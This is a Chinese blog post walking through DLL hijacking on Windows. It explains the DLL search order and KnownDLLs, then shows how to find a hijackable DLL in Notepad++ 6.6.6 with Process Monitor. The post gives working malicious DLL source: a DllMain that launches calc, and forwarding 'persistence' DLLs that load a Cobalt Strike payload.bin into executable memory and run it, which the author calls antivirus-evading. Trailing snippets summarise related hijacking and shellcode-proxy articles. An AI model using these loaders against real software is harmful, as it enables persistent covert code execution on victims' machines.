千寻笔记:DLL劫持初探

一颗小胡椒2022-03-22 16:37:07

0x001 什么是DLL

Dll(动态链接库)作为 windows 的函数库,有助于促进代码的模块化、代码重用、有效的内存使用并减少磁盘空间;一个应用程序运行时可能需要依赖于多个 dll 的函数才能完成功能,如果控制其中任一dll,那么便可以控制该应用程序的执行流程。

Linux下静态库名字一般是: libxxx.a windows则是: *.lib、*.h

Linux下动态库名字一般是: libxxx.so windows则是: .dll、.OCX(..etc)

0x02 尝试编写dll

1.VS2017,新建DLL项目

 2. 初始dll文件


// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "pch.h"
BOOL APIENTRY DllMain( HMODULE hModule, // 模块句柄                       DWORD  ul_reason_for_call, // 调用原因                       LPVOID lpReserved // 参数保留                     ){    switch (ul_reason_for_call) // 根据调用原因选择不不同的加载方式    {    case DLL_PROCESS_ATTACH:     case DLL_THREAD_ATTACH:    case DLL_THREAD_DETACH:    case DLL_PROCESS_DETACH:        break;    }    return TRUE;}

dllmain.cpp文件下引入Windows.h库, 编写一个msg的函数。


// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "pch.h"#include 
void msg() {    MessageBox(0, L"Dll Load successful!", 0, 0);}
BOOL APIENTRY DllMain( HMODULE hModule,                        DWORD  ul_reason_for_call,                        LPVOID lpReserved                      ){    switch (ul_reason_for_call)     case DLL_PROCESS_ATTACH:     case DLL_THREAD_ATTACH:     case DLL_THREAD_DETACH:     case DLL_PROCESS_DETACH:        break;    }    return TRUE;}

然后需要在头文件framework.h中导出msg函数


#pragma once
#define WIN32_LEAN_AND_MEAN             // 从 Windows 头文件中排除极少使用的内容// Windows 头文件#include 
extern "C" __declspec(dllexport) void msg(void)

_declspec是关键字,用于表示该函数、变量时导出、导入的,括号里dllexport意为其将要导出,dllimport意为其将要导入。

extern "C"用于指定编译器编译后的函数别名,这样使用时才能正确查找到。即对于变量extern int a;这样的直接写为extern "C" int a;即可,函数同理。

然后进行编译,得到dlldemo.dll

0x03 调用dll

新建项目,编译生成test.exe

// test.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。#include #include using namespace std;
int main(){    // 定义一个函数类DLLFUNC    typedef void(*DLLFUNC)(void);    DLLFUNC GetDllfunc = NULL;    // 指定动态加载dll库    HINSTANCE hinst = LoadLibrary(L"dlldemo.dll");    if (hinst != NULL) {        // 获取函数位置        GetDllfunc = (DLLFUNC)GetProcAddress(hinst, "msg");    }    if (GetDllfunc != NULL) {        //运行msg函数        (*GetDllfunc)();    }}

成功调用dlldemo.dll

0x04 Dll劫持漏洞

原理

如果在进程尝试加载一个DLL时没有并没有指定DLL的绝对路径,那么Windows会尝试去按照顺序搜索这些特定目录来查找这个DLL,如果攻击者能够将恶意的DLL放在优先于正常DLL所在的目录,那么就能够欺骗系统去加载恶意的DLL,形成"dll劫持"。

DLL路径搜索目录顺序

1.应用程序加载的目录

2.系统目录,使用 GetSystemDirectory 获取该路径

3.16 位系统目录

4.Windows 目录,使用 GetWindowsDirectory 获取该路径

5.当前目录

6.PATH 环境变量中列出的目录

Know DLLs注册表项

从Windows7 之后, 微软为了更进一步的防御系统的DLL被劫持,将一些容易被劫持的系统DLL写进了一个注册表项中,那么凡是此项下的DLL文件就会被禁止从EXE自身所在的目录下调用,而只能从系统目录即SYSTEM32目录下调用。

默认情况HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode 处于开启状态;如果手动设置为 0,关闭该安全选项,搜索顺序为:在以上顺序基础上,将 5.当前目录 修改至 2.系统目录 的位置,其他顺移。

注册表路径如下:


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs


另外当应用程序加载 dll 时如果仅指定 dll 名称时,那么将按照以上顺序搜索 dll 文件,不过在加载之前还需要满足以下两条规范:

  • 当内存中已加载相同模块名称的 dll 时,系统将直接加载该 dll,不会进行搜索;除非设置了 dll 重定向选项;
  • 如果要加载的 dll 模块属于 Known DLLs,系统直接加载系统目录下的该 dll,不会进行搜索。

Windows操作系统通过“DLL路径搜索目录顺序”和“Know DLLs注册表项”来确定应用程序所要调用的DLL的路径,当一个进程尝试加载一个dll的时候,会先尝试搜索程序所处的目录,如果没有找到,则搜索系统即 SYSTEM32 目录,若还没有找到,则向下搜索16位系统目录即 SYSTEM 目录,然后Windows目录,当前目录,Path环境变量的各个目录。


这样的加载顺序很容易就会导致一个系统的dll被劫持,只要攻击者将目标文件和恶意dll放在一起即可,导致恶意dll搜索顺序优先于系统dll目录加载,就能够欺骗系统去加载恶意的DLL,形成"dll劫持"。

手动劫持

NotePad++(6.6.6)

用到的工具:Process Monitor v3.60

通过 Process Monitor 监控dll调用是一种最基础的寻找dll劫持的方式

设置过滤规则: (默认的不需要改变)


Path ends with .dllResult is NAME NOT FOUNDProcess Name contains notepad++.exe

然后这里找一个需要用到loadlibrary这个api的dll,这里找有这个api的原因是因为如果该dll的调用栈中存在有 **LoadLibrary(Ex)**,说明这个DLL是被进程所动态加载的。在这种利用场景下,伪造的DLL文件不需要存在任何导出函数即可被成功加载,即使加载后进程内部出错,也是在DLL被成功加载之后的事情。

LoadLibrary和LoadLibraryEx一个是本地加载,一个是远程加载,如果DLL不在调用的同一目录下,就可以使用LoadLibrary(L"DLL绝对路径")加载。但是如果DLL内部又调用一个DLL,就需要使用LoadLibraryEx进行远程加载,语法如下:


LoadLibraryEx(“DLL绝对路径”, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);

LoadLibraryEx的最后一个参数设置为LOAD_WITH_ALTERED_SEARCH_PATH即可让系统dll搜索顺序从我们设置的目录开始

找到可以被劫持的dll文件后,我们需要编写恶意dll


// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "pch.h"#include 
BOOL APIENTRY DllMain( HMODULE hModule,                       DWORD  ul_reason_for_call,                       LPVOID lpReserved                     ){    switch (ul_reason_for_call)    {    case DLL_PROCESS_ATTACH:        system("calc");    case DLL_THREAD_ATTACH:    case DLL_THREAD_DETACH:    case DLL_PROCESS_DETACH:        break;    }    return TRUE;    }

然后编译生成恶意dll,并放到Notepad++的根目录下

运行Notepad++.exe便会弹出计算器

EasyConnectInstaller(7.6.1.1)

转发劫持

使用恶意 dll 替换原文件,应用程序便可以加载我们的 dll 并执行恶意代码,但是应用程序运行依赖于 dll 提供的函数,恶意 dll 必须提供相同的功能才能保证应用程序的正常运行。这里利用了aheadlib工具,进行直接转发函数。

权限维持

1.这里利用到的测试环境是之前自己写的testDll.exe,进行直接转发函数,尝试加载shellcode(不免杀)


#include "pch.h"#include #include #include 
//导出函数#pragma comment(linker, "/EXPORT:msg=fkdllorg.msg")
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved){    if (dwReason == DLL_PROCESS_ATTACH)    {        DisableThreadLibraryCalls(hModule);        unsigned char buf[] ="shellcode"        size_t size = sizeof(buf);        char* inject = (char *)VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);        memcpy(inject, buf, size);        CreateThread(0, 0, (LPTHREAD_START_ROUTINE)inject, 0, 0, 0);    }    else if (dwReason == DLL_PROCESS_DETACH)    {    }    return TRUE;}


2.shellcode写内存(免杀)

CS生成RAW Payload,然后读取shellcode,申请内存,写内存,执行函数


#include "pch.h"#include #include #include 
//导出函数#pragma comment(linker, "/EXPORT:msg=fkdllorg.msg")
DWORD WINAPI DoMagic(LPVOID lpParameter){    FILE* fp;    size_t size;    unsigned char* buffer;
    fp = fopen("payload.bin", "rb");    fseek(fp, 0, SEEK_END);    size = ftell(fp);    fseek(fp, 0, SEEK_SET);    buffer = (unsigned char*)malloc(size);
    fread(buffer, size, 1, fp);
    void* exec = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);    memcpy(exec, buffer, size);
    ((void(*) ())exec)();
    return 0;}
BOOL APIENTRY DllMain(HMODULE hModule,    DWORD  ul_reason_for_call,    LPVOID lpReserved){    switch (ul_reason_for_call)    {    case DLL_PROCESS_ATTACH:        HANDLE threadHandle;        threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);        break;    case DLL_THREAD_ATTACH:    case DLL_THREAD_DETACH:    case DLL_PROCESS_DETACH:        break;    }    return TRUE;}

dll文件dll劫持
本作品采用《CC 协议》,转载必须注明作者和本文链接
目前还没有任何安全厂商公开披露该组织的攻击活动,也没有安全厂商公开披露利用该技术的真实APT攻击事件。由于此次攻击活动属于360全球首次捕获披露,我们根据该组织擅长攻击技术的谐音,将其命名为“旺刺”组织,并为其分配了新编号APT-C-47。
DLL(Dynamic Link Library)文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型。在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件
DLL劫持思路和研究
2021-10-25 10:13:22
基础知识DLL文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型。在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件。在这种利用场景下,伪造的DLL文件不需要存在任何导出函数即可被成功加载,即使加载后进程内部出错,也是在DLL被成功加载之后的事情。
C:\Users\dyy\AppData\Local\Programs\Python\Python38\Scripts\oci.dll使用 cs 生成恶意 dll,重命名为?后放置到该目录下手动挖掘Process Monitor 查找可用 dll,设置如下图所示配置完可以保存导出配置,下次直接导入使用使用?进行测试,运行程序 filter 加载所使用的 dll 文件这里可以看出来,当?文件编写一个基础的弹窗 dllJAVA1. // dllmain.cpp : 定义 DLL 应用程序的入口点。CS 上线cs 生成 c 的 payload生成的?填入到下面相应的位置上CPP1
Kaspersky AVP.exe DLL 劫持
2022-07-21 22:53:31
Kaspersky AVP.exe 中的 DLL 注入允许本地管理员在不知道 Kaspersky 密码的情况
一个应用程序运行时可能需要依赖于多个 dll 的函数才能完成功能,如果控制其中任一dll,那么便可以控制该应用程序的执行流程。
DLL劫持的防御策略
近日,安识科技A-Team团队监测到一则 Node.js 组件存在 DLL 劫持漏洞的信息,漏洞编号:CVE-2022-32223,漏洞威胁等级:高危。对此,安识科技建议广大用户及时升级到安全版本,并做好资产自查以及预防工作,以免遭受黑客攻击。Node.js 使用了一个事件驱动、非阻塞式 I/O 的模型,使其轻量又高效。
aDLL是一款功能强大的代码分析工具,可以帮助广大研究人员以自动化的方式识别并发现DLL劫持漏洞。
DLL 代理加载 shellcode
2020-10-27 17:59:01
DLL侧面加载或DLL代理加载允许攻击者滥用合法的和经过签名的可执行文件,以在受感染的系统上执行代码。使用上面的示例流程,将发生以下情况。签名,目标应该是经过数字签名的“合法”可执行文件。在运行时不安全地加载少量DLL ,可执行流必须是可劫持的,但我们不希望将超过1-3个DLL放到目标上以使我们的攻击才能顺利进行。名称应与原始DLL名称匹配,命名“ libnettle-7”,然后单击“创建”。我们使用SharpDllProxy生成源代码时定义了文件名“ ”。
一颗小胡椒
暂无描述